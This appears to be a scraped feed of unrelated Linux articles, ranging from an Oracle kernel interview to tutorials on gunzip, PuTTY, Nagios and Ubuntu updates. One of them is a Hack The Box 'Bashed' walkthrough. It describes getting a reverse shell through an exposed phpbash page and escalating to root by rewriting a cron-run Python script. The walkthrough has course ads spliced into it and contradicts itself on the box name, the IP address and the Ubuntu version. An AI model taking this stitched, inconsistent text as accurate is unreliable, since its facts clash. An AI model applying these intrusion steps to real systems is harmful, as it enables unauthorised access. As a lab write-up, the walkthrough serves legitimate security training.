Oracle Q&A. A Refresher on Unbreakable Enterprise Kernel

UEK

UEK is a Linux kernel that Oracle created to address the needs of customers running demanding software such as Oracle Database on large scale systems.

Oracle caused quite a stir in 2010 when it announced its Unbreakable Enterprise Kernel for Oracle Linux. We’ve checked in with Sergio Leunissen, Vice President, Linux and VM Development at Oracle, for an update on the ABCs of this important introduction as well as the company’s latest take on Linux.

Linux Foundation: First, please remind us what exactly is the Unbreakable Enterprise Kernel (UEK)?

Leunissen: UEK is a Linux kernel Oracle created to address the needs of customers running demanding software such as Oracle Database on large scale systems. Its focus is performance, stability, and minimal backports by tracking the upstream kernel code as closely as is practical. UEK is well-tested and used to run Oracle Engineered Systems, Oracle Cloud Infrastructure, and large enterprise deployments for Oracle customers. The source for UEK is published on GitHub: https://github.com/oracle/linux-uek

LF: Who is seeing the biggest benefit from the UEK?

Leunissen: First, it goes without saying that customers running Oracle software benefit from our development and testing of Oracle Database and middleware on tens of thousands of systems running Linux with UEK on a daily basis. Add to that the demands of running the infrastructure for Oracle Cloud running SaaS applications, databases, containers and Kubernetes clusters, etc. Our customers can take comfort in knowing that the kernel they run is the same one we run.

But, by no means do only Oracle customers benefit. Our kernel team adds features (to) and fixes bugs in subsystems that span the Linux kernel, including networking, block storage, filesystems, etc. This development will benefit any workload relying on the kernel’s overall ability to handle lots of memory, network, and I/O.

Finally, because UEK tracks upstream kernels so closely, the bugs we find and fix are relevant to the mainline Linux kernel.

LF: The Unbreakable Enterprise Kernel is touted as fast, modern and reliable. Can you elaborate on these benefits?

  • Fast – Optimized to run well on large systems with lots of memory and large storage systems. Works well with modern solid state storage.
  • Modern – tracking mainline Linux closely to incorporate the latest innovations
  • Reliable – Extensively tested by Oracle with real world workloads

Most customers we work with must stick to specific releases of core userspace components but do want to exploit innovations from upstream development efforts. With UEK, we are able to balance an enterprise support model with a Linux kernel that syncs up with mainline more frequently.

LF: How much emphasis do you put on security in your kernel development work?

Leunissen: Oracle is a cloud provider that contributes to Linux. Oracle Linux is the host OS for most of the Oracle application and infrastructure offerings. As such, we work closely with our cloud development team to build a scalable Linux platform with virtualization and container services without compromising on security. UEK is a key part of this.

LF: The Linux kernel developers at Oracle work both on mainline directly and UEK, can you explain how this works?

Leunissen: As mentioned above, we publish the source for UEK on GitHub. Keeping our changes open source enables us to integrate with upstream Linux kernels quickly, which also means we have state-of-the-art drivers and filesystems, hardware support, and security fixes from the community. And, again, because UEK tracks upstream kernels so closely, we don’t spend a lot of time addressing bugs that are unique to the kernel as it relates to Oracle’s efforts. Rather, our fixes are relevant to upstream kernels as well.

LF: Are there particular development projects you are working on that you’d like to highlight?

Leunissen: As a cloud provider, containers and virtualization are important to Oracle. We do a lot of work on KVM and QEMU. For example, we are doing work to make sure Xen VM guests can run as is on a KVM host. Recently we’ve been working on Kata containers (previously Clear Containers), which is a deployment model for applications that combines the isolation of VMs with the speed, footprint, and interaction model of containers. Also, with UEK powering tens of thousands of systems in our cloud, we are doing work to improve the startup time performance for Linux systems by parallelizing kernel boot-time tasks, shaving precious seconds off the startup time for bare metal and virtualized workloads. Finally, it would be remiss not to point out that we are actively working on Linux for ARM with the focus to provide a high-quality Linux OS for 64-bit ARM (aarch64)-based servers.

Source

SUSE Cloud Application Platform v1.3 released

Share with friends and colleagues on social media

SUSE Cloud Application Platform Stratos UI

SUSE Cloud Application Platform showing Kubernetes node metrics

SUSE Cloud Application Platform v1.3 is now available! If you’re in Seattle for Kubecon this week, be sure to stop by our booth for a new pair of socks, a demo, or to learn more. The new version focuses on our continuing effort to provide a cloud native developer experience to Kubernetes users, an improved UI, additional services brokers, and more.

You can now graphically track metrics and see into the underlying Kubernetes infrastructure with an updated version of Stratos UI. Stratos is a UI web console that manages Cloud Foundry clusters, and the workloads running on them, and is adding additional Kubernetes integration with each release. In this newest version, application and Kubernetes pod attributes such as CPU and memory usage are tracked in a graph over time, and the status of the underlying Kubernetes cluster is now available.

Easily connect to a broad range of services with open source service brokers for services hosted on Azure and Amazon, including MariaDB, MySQL, Oracle, PostgreSQL, SQL Server, and more. For development and testing purposes, the Helm Minibroker provisions services in containers on your Kubernetes cluster. It currently supports MySQL, PostgreSQL, MariaDB, and MongoDB.

New support for CredHub allows you to centrally secure and manage credential generation, storage, lifecycle management, and access. CredHub manages credentials like passwords, certificates, certificate authorities, ssh keys, rsa keys and arbitrary values (strings and JSON blobs). It provides a CLI and API to get, set, generate and securely store credentials.

SUSE Cloud Application Platform supports Amazon EKS, Azure AKS, and SUSE CaaS Platform. Support for additional public cloud Kubernetes services to follow.

Don’t forget that additional Kubernetes integration is coming soon with support for the Cloud Foundry Foundation’s Project Eirini along with Istio!

 

Share with friends and colleagues on social media

Source

Amber Is A Cool Ambiance-Inspired Gtk / Gnome Shell Theme

Amber Gtk theme

Amber is a Gtk+ 3, Gtk+ 2 and Gnome Shell theme inspired by Ubuntu’s Ambiance theme.

Amber uses slightly different colors than Ambiance, and no gradients for the applications toolbar, while still reminding of the ex-default Ubuntu theme (Ambiance was default until Ubuntu 18.10, when the default theme was changed to Yaru).

The theme only supports Gnome (Shell) right now, with Gtk 3.22 or newer being required (Ubuntu 18.04 and newer / Fedora 28 or newer). Update: the theme now also supports Xfce (Xfwm4):

Amber theme Xfce

Designed by Mattias (lassekongo83), known for his work on the beautiful Zuki themes, Amber ”

is almost finished

“, with some polishing being on the todo list, or so it says on its repository page. The theme looks great on my Ubuntu 18.10 desktop (with Gtk 3.24 and Gnome Shell 3.30), and I’ve been using it for about a week with no issues.

Amber Gtk theme

Amber Gnome Shell theme

You’ll notice that the theme comes with its own Dash to Dock (and Dash to Panel) running indicator style – the line to the left of the running applications. Ubuntu uses a fork of Dash to Dock that doesn’t allow disabling the default running indicator, so you’ll get both the Amber theme running indicator, as well as the one used by the Ubuntu Dock extension.

One way around this is to install the original Dash to Dock and disable it, then change its settings using Dconf Editor (org / gnome / shell / extensions / dash-to-dock / running-indicator-style) – changing its settings should affect not only the original Dash to Dock, but also Ubuntu Dock. Another way is to remove or disable the Ubuntu Dock and use the original Dash to Dock or Dash to Panel, which are much more customizable. This is only a minor inconvenience though.

Other Gtk themes you might like:

Install Amber Gtk / Gnome Shell theme

To install Amber, visit its GitHub repository, click the green Clone or download button, then click on Download ZIP. Extract the theme and copy the theme folder into ~/.themes. Create this folder if it doesn’t already exist (.themes is a hidden folder – press Ctrl + H to show/hide hidden files and folders).

Those who prefer to do this from the command line can run the commands below to create the ~/.themes folder, download and extract the theme, and remove the downloaded master.zip file:

mkdir -p ~/.themes && cd ~/.themes

wget https://github.com/lassekongo83/amber-theme/archive/master.zip

unzip master.zip

rm master.zip
If you’re familiar with Git, get the theme using Git so you can easily update it later.

The theme requires installing the Murrine and Pixbuf engines for Gtk+ 2. While there are very few applications that use Gtk+ 2 nowadays, it’s a good idea to install these anyway.

On Ubuntu or Debian you can install the Murrine and Pixbuf Gtk+ 2 engines using:

sudo apt install gtk2-engines-murrine gtk2-engines-pixbuf
On Fedora, use:

sudo dnf install gtk2-engines gtk-murrine-engine
On other Linux distributions, search for Murrine and Pixbuf using your package manager.

And finally, use the Gnome Tweaks application to change the applications and/or the shell theme. If you’re not familiar with this, see: How To Change The Gtk, Icon Or Gnome Shell Theme

Source

Tis the Season for My Top 10 Predictions for 2019

Share with friends and colleagues on social media

Tis the season for spending time with loved ones, reminiscing about the past year and of course, technology forecasts and predictions. Whether we like it or not, nothing ever stays the same, in life and in business. My kids get older, their personalities mature and as a parent, I have to evolve the way I interact with them. It is the same for business, customer expectations continue to evolve, new technologies are developed to push the envelope and all of that leads to continuous transformation of our business, our people, our processes and of course, the technology and infrastructure.

As I started thinking about expectations for the coming year, I was struck with a strange feeling of déjà vu. Much of what’s on my list for 2019 is remarkably similar to last year. But there is a difference. Much of what might have been considered emerging technology 12 months ago is now maturing nicely and ready for more mainstream adoption. And for many of the items on my list, that has happened remarkably quickly.

Here are my predictions for 2019:

1. More major cybersecurity breaches

No real surprise here. Serious data hacks seem to be coming thick and fast. Marriott is the latest to hit the news with the second biggest hack of all time. Here’s a serious reality check: If you haven’t got a strong security plan and measures in place already, it may already be too late.

2. Major business failures will again hit the headlines

Household names and brands disappearing is nothing new. Toys R Us filed for bankruptcy in 2018 and while there are efforts to save it, it is a good example of how a company must evolve to stay relevant. Expect more of them to fall, if they miss the opportunity to adapt and transform. Make sure you’re not one of them.

3. Accelerated Artificial Intelligence (AI) and Machine Learning (ML) application development and adoption

Organizations of all types and sizes have now bought into the productivity, efficiency and customer experience improvements to be gained from AI and ML. Leveraging high-performance computing, AI and ML underpin many of the tech trends I highlighted in 2018 including AR/VR, autonomous vehicles/drones, big data/analytics and robotics. Greater investment and focus in both these areas will surely follow.

4. The Internet of Things (IoT) is set to take off

But don’t expect IoT growth to be consumer-led – at least not yet. With IoT security improving and related technologies maturing, business IoT is my bet for a major expansion in 2019, with manufacturing, healthcare, retail and utilities at the forefront.

5. Expect to see more autonomous vehicles

They’re on our roads already in pilot programs. Over the next year, watch out for more real-world testing of cars, trucks and public transport, as well as industrial and farming vehicles.

6. Containers will make implementing hybrid/multi-cloud easier

Containerized applications and workloads are increasingly at the heart of development projects. Kubernetes and DevOps are now mainstream. Monolithic applications have had their day. Containers make it easier to implement a hybrid and multi-cloud strategy by deploying, moving or expanding cloud-native applications to your cloud platform of choice, even straddling cloud boundaries as needed.

7. Anticipate a new raft of technology-related acquisitions

More traditional, legacy businesses will be looking to buy innovation, new technologies and expertise in order to keep up with shifting market dynamics and in a move to avoid becoming irrelevant to their customer base.

8. Mobile devices will become even more indispensable to our lifestyle

Let’s be honest, most of us would be lost without our mobile phone, smartwatch or fitness tracker already. They’re how we now expect to interact with the world around us and how we want new real-time services delivered. Unfortunately, there is a downside. We are going to be even more glued to our devices.

9. Blockchain is finally going to deliver some business value.

While Blockchain is often maligned by many, there are new and valid use cases on the horizon that will help change perceptions. I expect interest to grow from government agencies, the finance sector, manufacturing, retail and the IoT world.

10. Open source software will continue to thrive and play a pivotal role in all of these predictions

Why? Because open source communities have become the vanguard of innovation. Open source software plays a pivotal role in all the dominant technology trends and is increasingly relied on by enterprise businesses around the globe.

Let me leave you with one more prediction.

At this time of year, it seems like everyone starts forecasting what the next year might bring. I predict that very few of them will get checked later to see if they were on the money or whether they missed the mark.

I’ll be checking mine from time to time throughout the year. I invite you to do the same.

Please feel free to send me your comments, observations or even your own predictions.

 

Share with friends and colleagues on social media

Source

Guide to Learn Linux gunzip Command with Examples

gunzip command

Have you come across files bearing a .gz extension? These are files which have been compressed using the gzip command. Gunzip is a Linux command that is used to decompress such files earing the .gz extension and in this tutorial, we will look at different usages of the Gunzip command.

But first, let’s compress a file using the gzip command. The syntax will be as follows

# gzip file_name

When you verify the file using the ls command, you will notice the presence of another file with the same file name but with a .gz extension.

Output

# file_name.gz

Let’s now see how we can decompress files.

1) Decompress files using the Gzip Command

In addition to compressing files, the gzip command can also be used to decompress files. The syntax for decompressing a file is

# gzip -d file_name.gz

Output

# file_name

To decompress files recursively in a folder add the -r flag as shown

# gzip -dr folder_name

2) Decompress files using the Gunzip Command

While the gzip command also comes in handy in compressing and decompressing files, Gunzip command is another command that allows you to decompress files in a very simple way that’s easy to remember. The syntax is

# gunzip file_name.gz

Output

# file_name

Once gunzip decompresses a file, the extension is removed. The file file_name.gz changes to file_name and is expanded to the maximum size.

3) Display verbose output of decompression

To display verbose output, append the -v flag as shown

# gunzip -v file_name.gz

Output

test_file.gz: 52.1% — replaced with test_file

4) Keep both the compressed file and the decompressed one

To keep both copies of the compressed and decompressed file run

# gunzip -k file_name.gz

You will now have two files, filename & filename.gz

Output

file_name.gz file_name

5) Display the output of the compressed file without first decompressing

To print out the output of the compressed file before decompressing it run

# gunzip -c file_name.gz

6) To display more information about a compressed file

To get more information about the compressed file run

# gunzip -l file_name.gz

The output of the command above command will give the following values

  • Compressed size
  • Uncompressed size
  • Ratio of compression
  • Uncompressed name

Gunzip Command

This information comes in handy when dealing with large file sizes, especially when you are running low on disk space. You wouldn’t want to carelessly uncompress large files lest they eat up your remaining disk space.

7) To decompress lot’s of files recursively

To achieve this, run

# gunzip -r folder_name

Let’s assume you have a folder structure like below where Office_files is the main folder containing zipped files sales.gz and marketing.gz plus another folder 2018 report with other zipped files.

office_files

sales.gz

marketing.gz

2018 Report

first_quarter_report.gz

second_quarter_report.gz

third_quarter_report.gz

last_quarter_report.gz

8) To decompress all the files within a directory

Run below command to decompress all of the files in the directory.

# gunzip -r office_files

9) Test whether a compressed file is a valid file compressed using gzip

To do this, run

# gunzip -t file_name.gz

If the file is invalid, you’ll get a warning but if it’s valid, nothing will be printed on the screen and you’ll be taken back to the shell.

Read Also:

Source

How to Install Putty on Ubuntu and Other Linux Distributions

How to Install Putty on Ubuntu and Other Linux Distributions

Last updated December 11, 2018

If I am not wrong, Putty is perhaps the most popular SSH client for Windows.

In IT companies, the development environment is usually on a remote Linux system while the developers use Windows as their local system. Putty is used for connecting to the remote Linux system from the Windows machine.

Putty is not limited to Windows only. You can also use this open source software on Linux and macOS.

But wait! Why would you use a separate SSH client on Linux when you already have the ‘real’ Linux terminal with you? There are several reasons why you would want to use Putty on Linux.

  • You have used Putty for so long on Windows that you are more comfortable with it.
  • You find it difficult to manually edit SSH config file to save the various SSH sessions. You prefer Putty’s graphical way of storing SSH connection.
  • You want to debug by connecting to raw sockets and serial ports.

Whatever may be the reason, if you want to use Putty on Ubuntu or any other Linux, you can certainly do so. Let me show you how to do that.

Installing Putty on Ubuntu Linux

Installing Putty on Linux

The good news for the Ubuntu users is that Putty is available in the universe repository of Ubuntu.

To install Putty on Ubuntu, you should first make sure that the universe repository is enabled.

sudo add-apt-repository universe

Once you have the universe repository enabled, you should update Ubuntu with this command:

sudo apt update

After this, you can install Putty with this command:

sudo apt install putty

Once installed, you can start Putty by finding it in the menu.

As you can see in the screenshot below, the Linux version of Putty looks the same as the Windows version. That’s a relief because you won’t have to fiddle around trying to find your way through a new and changed settings.

Putty in Linux

When you enter the remote system’s hostname or IP address and connect to it, Putty will utilize the already saved SSH keys in your home directory.

Using Putty in Ubuntu Linux

Installing Putty on other Linux distributions

Putty is available for Debian so you just need to use apt-get or aptitude for installing it.

sudo apt-get install putty

Putty is also available for Fedora/Red Hat and can be installed using the default package manager.

sudo dnf install putty

You can also easily install Putty in Arch Linux based distributions.

sudo pacman -S putty

Remember that Putty is an open source software. You can also install it via source code if you really want to. You can get the source code of Putty from the link below.

I would always prefer the native Linux terminal over an SSH client like Putty. I feel more at home with the GNOME terminal or Terminator. However, it’s up to an individual’s choice to use the default terminal or Putty in Linux

What do you use for managing multiple SSH connections on Linux?

Source

How To Install and Configure Nagios on CentOS 7

Nagios is one of the most popular open source monitoring systems. Nagios keeps an inventory of your entire IT infrastructure and ensures your networks, servers, applications, services, and processes are up and running. In case of failure or suboptimal performance Nagios will send notification alerts via various methods.

This tutorial describes how to install and configure Nagios Core on a CentOS 7 server.

Prerequisites

Before continuing with this tutorial, make sure you are logged in as a user with sudo privileges.

Disable SELinux or set in permissive mode as instructed here.

Update your CentOS system and install Apache, PHP and all the packages necessary to download and compile the Nagios main application and Nagios plugins:

sudo yum update
sudo yum install httpd php php-cli gcc glibc glibc-common gd gd-devel net-snmp openssl-devel wget
sudo yum install make gettext autoconf net-snmp-utils epel-release perl-Net-SNMP postfix unzip automake

Installing Nagios on CentOS

Perform the following steps to install the latest version of Nagios Core from source.

1. Downloading Nagios

We’ll download Nagios source in the /usr/src directory which is the common location to place source files.

Navigate to the directory with:

Download the latest version of Nagios from the project Github repository using the following wget command:

sudo wget https://github.com/NagiosEnterprises/nagioscore/archive/nagios-4.4.2.tar.gz

Once the download is complete extract the tar file with:

sudo tar zxf nagios-*.tar.gz

Before continuing with the next steps, make sure you change to the Nagios source directory by typing:

2. Compiling Nagios

To start the build process run the configure script which will perform a number of checks to make sure all of the dependencies on your system are present:

Upon successful completion, the following message will be printed on your screen:

*** Configuration summary for nagios 4.4.2 2018-08-16 ***:

General Options:
————————-
Nagios executable: nagios
Nagios user/group: nagios,nagios
Command user/group: nagios,nagios
Event Broker: yes
Install $: /usr/local/nagios
Install $: /usr/local/nagios/include/nagios
Lock file: /run/nagios.lock
Check result directory: /usr/local/nagios/var/spool/checkresults
Init directory: /lib/systemd/system
Apache conf.d directory: /etc/httpd/conf.d
Mail program: /sbin/sendmail
Host OS: linux-gnu
IOBroker Method: epoll

Web Interface Options:
————————
HTML URL: http://localhost/nagios/
CGI URL: http://localhost/nagios/cgi-bin/
Traceroute (used by WAP): /bin/traceroute

Review the options above for accuracy. If they look okay,
type ‘make all’ to compile the main program and CGIs.

Start the compilation process using the make command:

The compilation may take some time, depending on your system. Once the build process is completed, the following message will be printed on your screen:

….
*** Compile finished ***

For more information on obtaining support for Nagios, visit:

Nagios Support Home

*************************************************************

Enjoy.

3. Creating Nagios User And Group

Create a new system nagios user and group by issuing:

sudo make install-groups-users

The output will look something like below:

groupadd -r nagios
useradd -g nagios nagios

Add the Apache apache user to the nagios group:

sudo usermod -a -G nagios apache

4. Installing Nagios Binaries

Run the following command to install Nagios binary files, CGIs, and HTML files:

You should see the following output:


*** Main program, CGIs and HTML files installed ***

5. Creating External Command Directory

Nagios can process commands from external applications. Create the external command directory and set the proper permissions by typing:

sudo make install-commandmode*** External command directory configured ***

6. Install Nagios Configuration Files

Install the sample Nagios configuration files with:


*** Config files installed ***

Remember, these are *SAMPLE* config files. You’ll need to read
the documentation for more information on how to actually define
services, hosts, etc. to fit your particular needs.

7. Install Apache Configuration Files

Run the command below to install the Apache web server configuration files:

sudo make install-webconf…
*** Nagios/Apache conf file installed ***

8. Creating Systemd Unit File

The following command installs a systemd unit file and also configure the nagios service to start on boot.

sudo make install-daemoninit…
*** Init script installed ***

9. Creating User Account

To be able to access the Nagios web interface wel’ll create an admin user called nagiosadmin

Run the following htpasswd command to create a user called nagiosadmin

sudo htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

You will be prompted to enter and confirm the user’s password.

New password:
Re-type new password:
Adding password for user nagiosadmin

Restart the Apache service for changes to take effect:

sudo systemctl restart httpd

Configure the Apache service to start on boot.

sudo systemctl enable httpd

10. Configuring Firewall

The firewall will secure your server against unwanted traffic.

If you don’t have a firewall configured on your server, you can check our guide about how to setup a firewall with firewalld on centos

Open the Apache ports by running the following commands:

sudo firewall-cmd –permanent –zone=public –add-service=http
sudo firewall-cmd –permanent –zone=public –add-service=https
sudo firewall-cmd –reload

Installing Nagios Plugins

Switch back to the /usr/src directory:

Download the latest version of the Nagios Plugins from the project Github repository:

sudo wget -O nagios-plugins.tar.gz https://github.com/nagios-plugins/nagios-plugins/archive/release-2.2.1.tar.gz

When the download is complete extract the tar file:

sudo tar zxf nagios-plugins.tar.gz

Change to the plugins source directory:

cd nagios-plugins-release-2.2.1

Run the following commands one by one to compile and install the Nagios plugins:

sudo ./tools/setup
sudo ./configure
sudo make
sudo make install

Starting Nagios

Now that both Nagios and its plugins are installed, start the Nagios service with:

sudo systemctl start nagios

To verify that Nagios is running, check the service status with the following command:

sudo systemctl status nagios

The output should look something like bellow indicating that Nagios service is active and running.

nagios.service – Nagios Core 4.4.2
Loaded: loaded (/usr/lib/systemd/system/nagios.service; enabled; vendor preset: disabled)
Active: active (running) since Sat 2018-12-08 14:33:35 UTC; 3s ago
Docs: https://www.nagios.org/documentation
Process: 22217 ExecStart=/usr/local/nagios/bin/nagios -d /usr/local/nagios/etc/nagios.cfg (code=exited, status=0/SUCCESS)
Process: 22216 ExecStartPre=/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg (code=exited, status=0/SUCCESS)
Main PID: 22219 (nagios)
CGroup: /system.slice/nagios.service

Accessing the Nagios Web Interface

To access the Nagios web interface open your favorite browser and type your server’s domain name or public IP address followed by /nagios:

http(s)://your_domain_or_ip_address/nagios

Enter the nagiosadmin user login credentials and you will be redirected to the default Nagios home page as shown on the image below:

Conclusion

You have successfully installed the latest Nagios version from source on your CentOS system.

You should now check the Nagios Documentation and learn more about how to configure and use Nagios.

If you hit a problem or have a feedback, leave a comment below.

Source

Pop the Box – ls /blog

Let[s] talk a little about this box. In this HTB machine we will see only one port is open and that will be the http one , we will fireup the dirbuster to find the different files and directories inside that website. We will came to know about the phpbash file from where we will be getting code execution. After getting the ever shell we will enumerate more and will be able to find the way to escalate the privileges and became root. This time I have made two video[s] the first one will be on getting our first reverse shell on the box and the second one will be on how we will be able to escalate the privileges. Hope you guys will enjoy it. In last but not the least I have uploaded some file[s] from which you will be able to learn about bash scripting, python and you will learn about the cronjob working.

TenTen BOX WALKTHROUGH

About this machine

  1. Machine Name: Bashed
  2. Machine Architecture : Linux
  3. Machine creator: Arrexel
  4. IP address: 10.10.10.68
  5. User owned: 6334
  6. User rooted: 4218
  7. Points: 20

Pre-requestie[s]

  1. As always you must have the hackers mindset to approach different vulnerabilities,
  2. This time you need some little bit knowledge about bash and python.
  3. You must know how to use dirbuster or any other tool for finding different folders and file.
  4. You must know how to use NMAP for scanning port’s.
  5. If you know bash then it will be plus point.
  6. Different approaches
  7. Try Harder mind set

[Disclaimer : That’s all you need, Now let’s try to Pentest this machine.]

Enumeration Part

-Nmap Scan

So, first we need to scan for the open ports. Let’s do it.

We will use nmap’s 3 option’s “i.e -sS , -sV and -sC”. You must be wondering what are these. Actually these are nothing they are just a scanning options. I really want you all to read the man page of nmap from there you can understand what are these options used for. Let me just point them out simply.

  1. -sS: For scanning TCP SYN. You need to the root privilege also to use option, I believe.
  2. -sV: For scan for open ports to determine there services and version informations.
  3. -sC: It is used for using the default nse nmap script. To know what are NSE script read this article. [Chapter 9. Nmap Scripting Engine] Just read about it and you will understand.
  4. -Pn: This option will treat all hosts as online, no matter what. This is a good practice to use it to bypass filtration something.

Hyperledger Fabric Fundamentals (LFD271)$299

The scan is completed as you can see in the above screenshot. So as you all can see only the port 80 is open.

-Understanding Nmap output

So we have only two open port[s] now let’s try to understand the output.

#1

Port: 80

State:Open

Service: http

Version: Apache httpd 2.4.18

Let[s] check what it is really looking like.

It seems like it[s] working perfectly. Anyways let[s] start enumerating the box.

$299 WILL ENROLL YOU IN OUR SELF PACED COURSE – LFS205 – ADMINISTERING LINUX ON AZURE!

Low Level Exploitation

The very first thing that I always used do is to check the source page and the robots.txt file.

So here it is ,

I don’t know if you are able to see it or not but there is nothing interesting here.

So, let[s] start our favorite dirbuster for finding the directory. If you don’t know what it is then let me tell you.

Dirbuster:- It is a java tool that is designed to brute force the directory and the webpages in the website[s]. It is OWASP Projectyou can read more about it “Here”. Let[s] start it:-

In target URL option you need to define the address of the website here in our case it is 10.10.10.48, in Number of threads I have increased it to 54 to speed up the process and under wordlist option you need to specify the directory list. I used the one that the dirbuster come[s] with medium one. Give the file extension according to your need, the php is just fine for me here. Let’s start our DirBuster.

So as you can see we got too many folder[s] and some php files. So, I have just export the result in text file. Here it is:

DirBuster 1.0-RC1 – Report

http://www.owasp.org/index.php/Category:OWASP_DirBuster_ProjectReport produced on Mon Apr 30 02:48:56 EDT 2018

——————————–

http://10.10.10.68:80——————————–

Directories found during testing:
Dirs found with a 200 response:

/images/
/uploads/
/js/
/php/
/demo-images/
/css/
/dev/
Dirs found with a 403 response:
/icons/
——————————–
Files found during testing:
Files found with a 200 responce:
/index.html
/single.html
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/custom_google_map_style.js
/js/html5.js
/php/sendMail.php
/js/jquery.mousewheel.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.easing.1.3.js
/js/jquery.touchSwipe.min.js
/js/main.js
/css/carouFredSel.css
/css/clear.css
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/dev/phpbash.min.php
/dev/phpbash.php
——————————–

REGISTER TODAY FOR YOUR KUBERNETES FOR DEVELOPERS (LFD259) COURSE AND CKAD CERTIFICATION TODAY! $499!

Let[s] check that php directory.

Their is one “sendMail.php” php file. Let[s] check /dev directory now.

Okay so here are also some directory. Let[s] try to open phpbash.php

Okay so it is looking like a terminal using bash. So, now we can execute the commands.

Amazing let[s] try to get the reverse shell on this box.

Now we finally got our first low fruit reverse shell on this machine.

SO, finally we got our low fruit privilege on this box.

$299 REGISTERS YOU FOR OUR NEWEST SELF PACED COURSE! LFD201 – INTRODUCTION TO OPEN SOURCE DEVELOPMENT, GIT, AND LINUX!

Privilege Escalation

So now we need to escalate the privileges to become “root”. In this box I will be going to show you three different methods of privilege escalation on this machine.

First let’s start our enumeration manually first then we will upload some scripts to check other stuffs. Let’s start with checking Distribution type by command “ cat /etc/issue

www-data@bashed:/home/arrexel$ cat /etc/issue Ubuntu 16.04.2 LTS n l

Okay so this is Ubuntu box running version Ubuntu 9.10, Great. Now let’s check what files have root privileges which we can probably read, write and execute by the command.

www-data@bashed:/home/arrexel$ find / -perm -222 -type d 2>/dev/null
/var/www/html/uploads
/var/tmp
/var/lib/php/sessions
/run/lock
/tmp
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.XIM-unix
/tmp/VMwareDnD
/tmp/.ICE-unix
/tmp/.X11-unix
/dev/mqueue
/dev/shm
www-data@bashed:/home/arrexel$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/umount
/bin/ping6
/bin/ntfs-3g
/bin/ping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

Nothing seems interesting here. So now let[s] try “sudo -l” to list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host. A longer list format is used if this option is specified multiple times and the security policy supports a verbose output format.

So, we can sudo to scriptmanager user without any password. Let[s] do it.

Amazing now we are no longer www-data , Let[s] start our enumeration from the root directory now “ / “

If you are having Linux as your primary operating system then you will notice “/scripts” directory is something suspicious. Which do not come with Linux by default. SO, lets check what are the files and directories inside that folder.

We are having two files : test.py and test.txt . Let[s] check what is written in test.py

Okay so it is a simple python script which is opening the file test.txt in writing mode and writing “testing 123!” inside that test.txt file. After writing it is closing that file. If you will see the above screenshot again you will see test.txt was created 00:42 minute ago. Means maybe cron job is running every minute.

Here is the proof that it is running every minute. Now we know that whatever is inside test.py it will be executed as root. So, now we can re-write the test.py and enter our python reverse shell.

Amazing we finally escalated the privileges

.Source

How to Update Ubuntu [Terminal & GUI Methods] It’s FOSS

This tutorial shows you how to update Ubuntu for both server and desktop versions. It also explains the difference between update and upgrade along with a few other things you should know about updates in Ubuntu Linux.

If you are a new user and have been using Ubuntu for a few days or weeks, you might be wondering how to update your Ubuntu system for security patches, bug fixes and application upgrades.

Updating Ubuntu is absolutely simple. I am not exaggerating. It’s as simple as running two commands. Let me give you more details on it.

Please note that the tutorial is valid for Ubuntu 18.04, 16.04 or any other version. The command line way is also valid for Ubuntu-based distributions like Linux Mint, Linux Lite, elementary OS etc.

Update Ubuntu via Command Line

How to Update Ubuntu

On the desktop, open the terminal. You can find it in the menu or use the Ctrl+Alt+T keyboard shortcut. If you are logged on to an Ubuntu server, you already have access to a terminal.

In the terminal, you just have to use the following command:

sudo apt update && sudo apt upgrade -y

It will ask for password and you can use your account’s password. You won’t see the anything on the screen while typing so keep on typing your password and hit enter.

Now let me explain the above command.

Actually, it’s not a single command. It’s a combination of two commands. The && is a way to combine two commands in a way that the second command runs only when the previous command ran successfully.

The ‘-y’ in the end automatically enters yes when the command ‘apt upgrade’ ask for your confirmation before installing the updates.

Note that you can also use the two commands separately, one by one:

sudo apt update
sudo apt upgrade

It will take a little longer because you have to wait for one command to finish and then enter the second command.

Explanation: sudo apt update

This command updates the local database of available packages. If you won’t run this command, the local database won’t be updated and your system will not know if there are any new versions available.

This is why when you run the sudo apt update, you’ll see lots of URLs in the output. The command fetches the package information from the respective repositories (the URLs you see in the output).

Updating Ubuntu Linux

At the end of the command, it tells you how many packages can be upgraded. You can see these packages by running the following command:

apt list –upgradable

Additional Reading: Read this article to learn what is Ign, Hit and Get in the apt update command output.

Explanation: sudo apt upgrade

This command matches the versions of installed packages with the local database. It collects all of them and then it will list all of the packages that have a newer version available. At this point, it will ask if you want to upgrade (the installed packages to the newer version).

Update Ubuntu Linux via Command Line

You can type ‘yes’, ‘y’ or just press enter to confirm the installation of updates.

So the bottom line is that the sudo apt update checks for the availability of new versions while as the sudo apt upgrade actually performs the update.

The term update might be confusing as you might expect the apt update command to update the system by installing the updates but that doesn’t happen.

Update Ubuntu via GUI [For Desktop Users]

If you are using Ubuntu as a desktop, you don’t have to go to terminal just for updating the system. You can still use the command line but it’s optional for you.

In the menu, look for ‘Software Updater’ and run it.

Run Software Updater in Ubuntu

It will check if there are updates available for your system.

Checking if updates are available for Ubuntu

If there are updates available, it will give provide you with options to install the updates.

Install Updates via Update Manager in Ubuntu

Click on Install Now, it may ask for your password.

Installing Updates in Ubuntu Linux via GUI

Once you enter your password, it will start installing the updates.

Updating Ubuntu via GUI

In some cases, you may need to reboot the system for the installed updates to work properly. You’ll be notified at the end of the update if you need to restart the system.

Updating Ubuntu via GUI

You can choose to restart later if you don’t want to reboot your system straightaway.

Installing updates via GUI in Ubuntu

Tip: If the software updater returns an error, you should use the command ‘sudo apt update’ in the terminal. The last few lines of the output will contain the actual error message. You can search on the internet for that error and fix the problem.

Few things to keep in mind abou updating Ubuntu

You just learned how to update your Ubuntu system. If you are interested, you should also know these few things around Ubuntu updates.

Clean up after an update

Your system will have some unnecessary packages that won’t be required after the updates. You can remove such packages and free up some space using this command:

sudo apt autoremove

